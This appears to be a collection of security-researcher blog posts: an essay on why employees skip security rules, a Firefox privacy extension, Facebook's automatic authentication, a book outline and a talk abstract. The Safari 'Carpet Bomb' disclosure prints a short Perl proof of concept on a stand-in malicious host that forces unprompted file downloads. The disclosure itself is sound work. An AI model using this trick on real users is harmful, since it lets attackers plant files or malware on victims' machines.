Consider the perspective of an enterprise when a number of employees do not follow best practice security advice, such as securing their laptops at their work place. This behavior can contribute to a high probability of adverse consequences to the business. However the same amount of risk is not borne by the individual employee.

As an illustration, consider the case of laptop theft. Let us assume a situation where an employer repeatedly warns employees to secure laptops using cables provided. In a mid-sized company of 5,000 employees, even if 90% of the employees were to follow instructions, the remaining 500 employees who reject the advice pose a significant risk to the business since the probability of at least 1 out of 500 unsecured laptops being stolen on an annual basis is a realistic (and conservative) estimation.

The cost to the enterprise per stolen laptop (unencrypted) is estimated to be around $49,246 [5]. More importantly, the value of this cost is based on the following components: replacement cost, detection, forensics, data breach implications, lost intellectual property, lost productivity and legal, consulting and regulatory expenses. In addition to the measurable cost to the business, the loss due to brand damage can be and often is significant

Given our conservative guess of 1 laptop stolen annually for every 500 employees that do not bother to secure their laptops, the risk to the enterprise is a sure thing. But what about the individual employee? The employee risks termination, yet the probability of the individual having her laptop stolen from the pool of other 499 employees who do not follow security mandates, is low.

This purpose of this hypothetical discussion is to purely point out the variance of risk from the perspective of the enterprise as a collective versus the individual employee. In the majority of situations, the risk borne by the business as a whole is easily comprehended by those who comprehend enterprise risk, yet the individual worker may not share similar perspective of risk.

2.2 Game Theory

In the previously discussed scenario, the calculations demonstrate variance of cost to the individual versus cost to the collective enterprise. However, it can be argued that the employee’s job security relies upon the overall well-being of the enterprise. This sentiment promotes the notion that employees can be expected to collectively cooperate and follow security mandates. In this sense, the context of the operative word “cooperate” should test to see if employee’s actions in following policies for the overall good of the enterprise are influenced by what they notice their peers doing.

The “Prisoner’s Dilemma” [6] is a popular game theory [7] problem that has been used to show why two people may not cooperate even if it in both their interests to do so. This problem has been extended to study the cooperation, or lack thereof, of individual entities to promote a common interest. For example, environmental studies have clearly provided evidence of the upcoming perils mankind is doomed to face given the climate change crisis. Given this situation, individual countries know they will ultimately benefit from everyone doing their part to promote a stable climate in the future. However, with game theory related experiments deriving from the “Prisoner’s Dilemma” approach, results repeatedly demonstrate that while individual countries agree with the rationale that everyone must contribute for the greater good of all, they are unable to rationalize on an individual level to do their part in the equation [8].

Extending the general findings from “Prisoner’s Dilemma” experiments to the hypothetical scenario presented in the earlier section, it is possible to see why individuals who are consciously aware of the need to cooperate in following security mandates may fail to do so. This situation lends to the phenomenon where users who do not follow security

requirements appear to “free-ride” on the notion that the remaining majority of the users are following the security advice thereby lowering the probability of harm to the well-being of the collective [9].

Our acknowledgement of differences in perspectives of risk and our comprehension of cognitive decision making processes will assist us in enforcing security mechanisms that are well designed to engage active participant from the end users. In the next section, we will build on our discussion to include examples of psychological and economical underpinnings at work that can help facilitate further improvement in our understanding.

3. Psychology and Economics at Play

Given that the scope of this discussion is to hypothesize why individuals do not follow mandates even when consequences are clearly advertised, let us first take a look at examples of how psychological biases are often active in this regard. Furthermore, let us briefly discuss the cost:benefit calculation individuals are likely to make prior to deciding whether to invest effort into performing requested tasks.

Once we go through examples of how psychology and economics are used make decisions, we will be in a better position to discuss recommendations on how to leverage research within these fields to drive better adoption of information security mandates.

3.1 Psychological Biases

Security controls are often designed with the misguided assumption that human rationality is void of biases. On the contrary, human decision consistently contain psychological biases that are predictable and measurable. As such, let us discuss two examples of biases that are often activated when individuals seek to comprehend and act upon information security events.

Valence Effect:The Valence Effect is the tendency of individuals to overestimate the probability of positive outcomes. For example, in one experiment, all things being equal, participants assigned a higher probability to picking a card that had a smiling face on its reverse side than which had a frowning face [10].

Extending the knowledge of results from repeated experiments performed to demonstrate the valence effect, it is easy to see how this bias influences employee behavior: individuals who do not follow security mandates have a psychological bias promoting the idea that other individuals are more likely to cause adverse incidents. In a similar vein, studies have shown that online social media users believe that providing personal information publicly could cause privacy problems to other users (the same users don’t seem concerned about the probability of privacy issues they could face for sharing similar information) [11].

Anchoring: Anchoring is a cognitive bias that describes the common human tendency to rely too heavily (“anchor”) on one trait or piece of information when making decisions.

Research has shown that individuals often believe “neat looking” websites are more trustworthy from a privacy and security standpoint [12] by anchoring their bias using their visual experiences to correlate website design with previously successful transactions. It is easy to understand how this bias can cause individuals to bypass advice from security awareness programs on how to identify and steer clear of risky situations.

Research in psychology has uncovered empirical evidence to support various categories of biases. As described in the examples, such biases can be clearly correlated to understand why many individuals fail to execute security requirements.

3.2 Rational Rejection of Security Mandates

Individuals implicitly perform a cost:benefit calculation when deciding whether to execute a previously taught security mandate or not. This hypothesis derives from work in the field of behavioral economics as well as information security research experiments performed recently. Coupled with the comprehension of individual perspectives and psychology, the understanding of how individuals perform implicit cost:benefit decisions will ultimately help organizations create security requirements that are designed to appeal to the human psyche, thus driving increased adoption.

When people make decisions to perform a given task, they quickly perform a calculation to ascertain if the cost of performing it is worth the return. The cost to the individual can be bounded in terms of financial harm, time taken and effort required. In addition to biases discussed in previously, users quickly decide if the total gain from following security advice is worth the effort. In many security research experiments, the data shows that users reject security advice because the cost to complete the security requirements is too high.

Consider the case of phishing websites that have the potential of stealing corporate and user data by posing as legitimate sites. Employees are repeatedly taught to investigate their web browser’s address bar to make sure they are browsing legitimate websites. However, even the most well-known domain names for well respected institutions repeatedly redirect the user to multiple locations. In this situation, the user must have the technical ability to dissect and parse the browser address bar and distinguish the host name, the domain name, followed by the path to the website resources, and any applicable parameters. To the average non-technical individual, the burden is too high [3]. Should the individual expose corporate data to a malicious website, the cost of this data breach is borne by the corporation.

Also consider the cases of SSL certificate warnings displayed by web-browsers. Users are instructed to be cognizant of such warnings because they may be the indicator of an ongoing Man-in-the-Middle attack that can jeopardize corporate information. However, research has shown, that from the end user’s perspective, close to 100% of such warnings are false positives [3]. It is easy to see how the high probability of a false positive warning with minimum or close to zero return and effort costs makes it rational for users to anchor against following security advice.

Having discussed examples of how psychology and decision economics influence decisions, it is easy to see why it is vital that these variables are accounted when developing security requirements. If we want users to actually adopt and execute on security mandates, we need to make sure the requirements are designed to appeal to the human cognition.

4. Recommendations

Based on the investigation of psychological perspectives and cost:benefit analysis using behavioral economic principles, the research community has gained further insight into why individuals often reject following security mandates. In these situations, with all other variables being equal, accelerating accountability by enforcing stricter consequences is not likely to positively influence user behavior.

Businesses that seek to positively influence their risk posture by influencing users and promoting positive culture change in information security should consider the following recommendations:

Identify and automate security responses that can be machine parsed and computed instead of relying on human decisions.

Re-evaluate business risk assessment methodologies to account for differences in collective and individual perspective based on risk, cost, and probability.

Discover and calculate the influence of popular psychological biases to ascertain why employees may have the tendency to bypass advertised security requirements.

Detect cases where security requirements may have a high cost rate for the individual. In such cases, evaluate whether the issue is promoting risk to the enterprise, and if so, consider redesigning the usability or altering the control such that the user is psychologically influenced to engage.

Leverage well known psychological biases for the benefit of information security related communications.

Security mandates are important and it is only fair that employees who do not follow instructions that put the enterprise at risk should face clear consequences. However, the risk of solely depending on this approach ignores vital variables such as individual perspectives, psychology and simple behavioral economics. Information security personnel should be monitored to make sure they are not solely pushing for a consequence driven culture that makes their job easier by promoting irrational and high cost security requirements to the end users in the guise of accountability.

June 01, 2010

It is my opinion that the popular expectation that Facebook will eventually take privacy seriously is unfounded. Facebook is a profitable entity and their business roadmap clearly illustrates that they feel they are at a stage where user privacy must be compromised for their business to grow.

In other words, it is the users who must battle with the decision to either stop using Facebook, or to accept to collaborate and communicate using a platform that mines their private information to compute business intelligence for eventual profit.

Perhaps this is a fair set of options, given that the concept of ‘social privacy’ is an oxymoron: if we want to be social and benefit from it, we must share information about ourselves. However, this sort of reasoning is not grounded in reality, for the same reason that disconnecting your computer from the Internet to gain the utmost level of security isn’t a reasonable option (for most people).

It is also my opinion, that the online social space has created a condition where the end users must ultimately collaborate to initiate an ongoing privacy arms race. To promote this sentiment, and to further the cause of research in this field, I’d like to announce the AntiSocial project.

The AntiSocial project is a subset of my research under the NeuroSploits umbrella (more on NeuroSploits later). I have developed a Firefox extension to promote this effort. If you are in a hurry, you can download it from https://addons.mozilla.org/en-US/firefox/addon/162098/ (beware that is is an initial release, but you are most welcome to try it out and provide feedback).

At the moment, the following is what AntiSocial aims to do and how it works.

A. Provide additional privacy controls and features to the user by:

- Preventing external sites from including Facebook content. This prevents Facebook from being able to track the user’s browsing habits external to Facebook (via the Referrer header).

Figure: Screenshot of CNN.COM being prevented from embedding Facebook content

- Preventing users from landing upon Facebook from external resources. This also prevents Facebook from being able to track the user’s browsing habits external to Facebook (via the Referrer header).

- Banning all access to 3rd party Facebook applications, including applications that choose to use Facebook’s Automatic Authentication in which users are not given the opportunity to authorize the execution of the 3rd party application. This will prevent arbitrary 3rd parties from being able to capture user data.

Figure:
Screenshot of of AntiSocial in Firefox task bar

- Preventing external sites that are landed on from Facebook from capturing this fact (by modifying the Referrer header).

- [more to come]

B. Increase the noise to signal ratio of business intelligence collected by social media platforms (currently Facebook) by [research in progress]:

- Changing the Referrer header while the user browses the Facebook platform (this will not stop Facebook from collecting intelligence about the user's browsing habits within the platform, but it may make their data mining slightly more expensive).

- Changing the referrer information tracked within the Facebook cookie (this will not stop Facebook from collecting intelligence about the user's browsing habits within the platform, but it may make their data mining slightly more expensive).

- Initiating arbitrary requests to the Facebook platform to make it harder for Facebook and 3rd parties from computing business intelligence (work in progress) for given sets of computations that the user may not agree to.

- [more to come]

Please feel free to contact me with any bug reports, questions, or ideas.

[As a caveat, I’m a fan of the NoScript Firefox plugin and I do realize that some (if not all) of these feature sets can and may be incorporated by NoScript - however, the AntiSocial Firefox extension aims to target users that may not be technically savy enough to maneuver a tool such as NoScript, and also to further my own understanding and research of privacy issues in social platforms].

May 22, 2010

Two years ago, I reported the Safari Carpet Bomb vulnerability to Apple. Apple responded back to let me know that they did not consider the issue a security vulnerability and had no immediate plans of fixing it. After obtaining explicit permission from the Apple security team to discuss the issue publicly, I disclosed it on May 14, 2008. This attack vector was eventually voted #3 in the “Top 10 Web Hacking Techniques of 2008” by security professionals around the world.

The Carpet Bomb issue was fixed on Safari for Windows due to pressure from Microsoft, most likely a result of threats from other security professionals who quickly realized the impact of cross application issues that contributed to remote command execution possibility on Windows. This caused Microsoft to release an advisory against Safari and Apple to eventually fix the issue on Safari for Windows.

However, 2 years later from my original disclosure, the Carpet Bomb vulnerability on OSX remains un-patched.

This means that if you use the Safari browser on OSX, a malicious entity can drop any amount of binaries or data files into your ~/Downloads/ folder. This issue is caused because, while most sane web browsers warn the end user and ask for explicit permission before saving a file locally, Safari goes ahead and saves the file into the default download location without asking the user - even if hundreds of files are served up by the malicious website simultaneously.

The technical details of the issue are the same as I reported 2 years ago, as follows: assume that a malicious website serves the following HTML:

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl

print "Content-type: blah/blah\n\n"

Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served.

If you are using Safari for OSX, this is what your ~/Downloads/ folder can look like after a single visit to the malicious site:

The impact of this issue should be clear to anyone with a reasonable and sound mind.

In this day and age, Fortune corporations are currently being infiltrated by way of state sponsored attacks and corporate espionage where a common initial step taken by malicious actors is to drop malware on the desktops of the targeted organization’s users.

BONUS! Unlike (most) other browsers, Safari (on both Windows and OSX this time) doesn’t bother to ask for the user’s permission prior to launching arbitrary local applications that handle registered URIs.

The following video capture demonstrates what would happen if you landed upon such a malicious site:

This may seem more of an annoyance at first glance, which in itself is an issue: denial of service towards the victim user’s desktop session. Furthermore, this behavior has the potential to be abused to exploit defects in how receiving applications accept the launch parameters and also to potentially feed local applications with malicious data that can in turn result in a compromise.

Given the continued rise in OSX’s market-share, and given the fact that Apple has decided to allow security issues like this remain un-patched, the Safari browser is increasingly likely to become the avenue of choice for the new generation of attackers.

April 06, 2010

Facebook users have been repeatedly warned and educated to comprehend the reality that 3rd party Facebook applications can consume their private information. As such, many users have begun to expect a fair warning (illustrated in the figure below) that includes an explicit authorization request from the Facebook platform,when a 3rd party Facebook application is accessed.

“Automatic authentication means that if a user visits an application canvas page (whether it's an FBML- or iframe-based canvas page), Facebook will pass that visitor's user ID to the application, even if the user has not authorized the application. The UID also gets passed when a user interacts with another user's application tab.

With this ID, the application can access the following data for most users (except for users who have chosen to not display a public search listing):

name

friends

Pages fanned

profile picture

gender

current location

networks (regional affiliations only)

list of friends”

The ‘Automatic Authentication’ feature is not new - it has been in place since July 2008. The reason I’m bringing this into attention today is for the following reasons:

Even the more privacy savy individuals are not aware of this ‘feature’. Individuals who have made the effort to learn about Facebook’s privacy settings are unlikely to be aware of this capability. Many of these users are likely to go trigger-happy by clicking on URLs within Facebook because they rely on the Facebook platform to ask for explicit authorization upon clicking on a 3rd party application page.

The implications of publicly available data and the potential ability of
a rogue 3rd party to uncloak a specific user’s identity are mutually
exclusive issues.

In their explanation on the developer wiki, Facebook explicitly states that 3rd party applications that use this feature can only gather information about the given user that may be publicly search-able anyway.

However, this assurance from Facebook is without merit because the implied reasoning is based upon flawed assumptions: the act of users choosing to make some of their information publicly search-able does not imply in any way that the users are granting the ability for rogue 3rd party applications to uncloak their identity (and data). Here is a simple example: my name is Nitesh Dhanjani and the information on my blog is public - however my web browser vendor cannot use this as a reasonable excuse to uncloak my identity to 3rd party web applications I visit.

The widening delta between the granularity of controls provided by social media platforms and the controls demanded by privacy advocates may lead to the need for client-side controls.

Image: The fb_fromhash parameter

For example, users that land upon Facebook applications will notice a parameter called _fb_fromhash which is present regardless of what authorization mechanism the 3rd party Facebook application chooses to use. This can be potentially leveraged to create a browser side control (example: Firefox plug-in) to warn the user that he or she may be accessing a 3rd party application that has the ability to automatically capture his or her identity. In other words, I foresee the need for a client side model to bridge the gap between privacy controls provided by vendors of social platforms versus the needs of individual users. Social-privacy-client-IDS, if you want to call it that.

Indeed, there is the clear rule of thumb pertaining to the use of online social applications: don’t put anything online that you wouldn’t want to persist in the public domain. However, this does not mean that brands in the business of providing us social platforms can go scott free. I sincerely hope the data contained in this post has provided you some additional information on how ‘automatic authentication' works, including the implications of which, in case you were not aware of it prior.

October 17, 2009

I am excited to announce that my new project (with a friend of mine who currently wishes to remain anonymous), http://securitystreams.tv/, is now live!

The goal of securitystreams.tv is to capture cutting-edge information security presentations in high quality and beautifully edited video for you to watch at your convenience.

Below is one of the presentations now available on securitystreams.tv (Bryan Sullivan's Defensive Rewriting):

For more, head on over to securitystreams.tv. We have additional videos from Billy Rios, Brett Hardin, and a few more to come (currently being edited!). You can even subscribe to the videos as a podcast (sync to your iPod, iPhone, Apple TV, xBox, etc) using our RSS feed. And stay in touch with our Twitter feed too.

DescriptionWith the advent of rich Internet applications, the explosion of social
media, and the increased use of powerful cloud computing
infrastructures, a new generation of attackers has added cunning new
techniques to its arsenal. For anyone involved in defending an
application or a network of systems, Hacking: The Next Generation is one of the few books to identify a variety of emerging attack vectors.

You'll not only find valuable information on new hacks that attempt to
exploit technical flaws, you'll also learn how attackers take advantage
of individuals via social networking sites, and abuse vulnerabilities
in wireless technologies and cloud infrastructures. Written by seasoned
Internet security professionals, this book helps you understand the
motives and psychology of hackers behind these attacks, enabling you to
better prepare and defend against them.

Understand the new wave of "blended threats" that take advantage of multiple application vulnerabilities to steal corporate data

Recognize weaknesses in today's powerful cloud infrastructures and how they can be exploited

Prevent attacks against the mobile workforce and their devices containing valuable data

Be aware of attacks via social networking sites to obtain confidential information from executives and their assistants

Get case studies that show how several layers of vulnerabilities can be used to compromise multinational corporations.

[Chapter 1] Intelligence Gathering: Peering Through the Windows to Your OrganizationTo successfully execute an attack against any given
organization, the attacker must first perform reconnaissance to
gather as much intelligence about the organization as possible. In
this chapter, we look at traditional attack methods as well as how
the new generation of attackers is able to leverage new technologies
for information gathering.

[Chapter 2] Inside-Out Attacks: The Attacker Is the InsiderNot only does the popular perimeter-based approach to security
provide little risk reduction today, but it is in fact contributing
to an increased attack surface that criminals are using to launch
potentially devastating attacks. The impact of the attacks
illustrated in this chapter can be extremely devastating to
businesses that approach security with a perimeter mindset where the
insiders are generally trusted with information that is confidential
and critical to the organization.

[Chapter 3] The Way It Works: There Is No PatchThe protocols that support network communication, which are
relied upon for the Internet to work, were not specifically designed
with security in mind. In this chapter, we study why these protocols
are weak and how attackers have and will continue to exploit
them.

[Chapter 4] Blended Threats: When Applications Exploit Each OtherThe amount of software installed on a modern computer system
is staggering. With so many different software packages on a single
machine, the complexity of managing the interactions between these
software packages becomes increasingly complex. Complexity is the
friend of the next-generation hacker. This chapter exposes the
techniques used to pit software against software. We present the
various blended threats and blended attacks so that you can gain
some insight as to how these attacks are executed and the thought
process behind blended exploitation.

[Chapter 5] Cloud Insecurity: Sharing the Cloud with Your EnemyCloud computing is seen as the next generation of computing.
The benefits, cost savings, and business justifications for moving
to a cloud-based environment are compelling. This chapter
illustrates how next-generation hackers are positioning themselves
to take advantage of and abuse cloud platforms, and includes
tangible examples of vulnerabilities we have discovered in today's
popular cloud platforms.

[Chapter 6] Abusing Mobile Devices: Targeting Your Mobile WorkforceToday's workforce is a mobile army, traveling to the customer
and making business happen. The explosion of laptops, wireless
networks, and powerful cell phones, coupled with the need to "get
things done," creates a perfect storm for the next-generation
attacker. This chapter walks through some scenarios showing how the
mobile workforce can be a prime target of attacks.

[Chapter 7] Infiltrating the Phishing Underground: Learning from Online Criminals?Phishers are a unique bunch. They are a nuisance to businesses
and legal authorities and can cause a significant amount of damage
to a person's financial reputation. In this chapter, we infiltrate
and uncover this ecosystem so that we can shed some light on and
advance our quest toward understanding this popular subset of the
new generation of criminals.

[Chapter 8] Influencing Your Victims: Do What We Tell You, PleaseThe new generation of attackers doesn't want to target only
networks, operating systems, and applications. These attackers also
want to target the people who have access to the data they want to
get a hold of. It is sometimes easier for an attacker to get what
she wants by influencing and manipulating a human being than it is
to invest a lot of time finding and exploiting a technical
vulnerability. In this chapter, we look at the crafty techniques
attackers employ to discover information about people to influence
them.

[Chapter 9] Hacking Executives: Can Your CEO Spot a Targeted Attack?When attackers begin to focus their attacks on specific
corporate individuals, executives often become the prime target.
These are the "C Team" members of the company—for instance, chief
executive officers, chief financial officers, and chief operating
officers. Not only are these executives in higher income brackets
than other potential targets, but also the value of the information
on their laptops can rival the value of information in the
corporation's databases. This chapter walks through scenarios an
attacker may use to target executives of large corporations.

[Chapter 10] Case Studies: Different PerspectivesThis chapter presents two scenarios on how a determined hacker
can cross-pollinate
vulnerabilities from different processes, systems, and applications
to compromise businesses and steal confidential data.

This talk will expose how voluntary and public information from new social media channels can enable you to remotely capture critical information about targeted individuals. Topics of discussion will include:

+ Hacking the Psyche: Remote behavior analysis that can be used to construct personality profiles to predict current and future psychological states of targeted individuals, including discussions on how emotional and subconscious states can be discovered even before the target is consciously aware.

+ Reconnaissance and pillage of private information, including critical data that the victim may not be aware of revealing, and that which may be impossible to protect by definition.

+ Techniques on how individuals may be remotely influenced by messaging tactics, and how criminal groups and governments may use this capability, including a case study of Twitter and the recent terror attacks in Bombay.

The goal of this presentation is to raise consciousness on how the new paradigms of social communication bring with it real risks as well as marketing and economic advantages.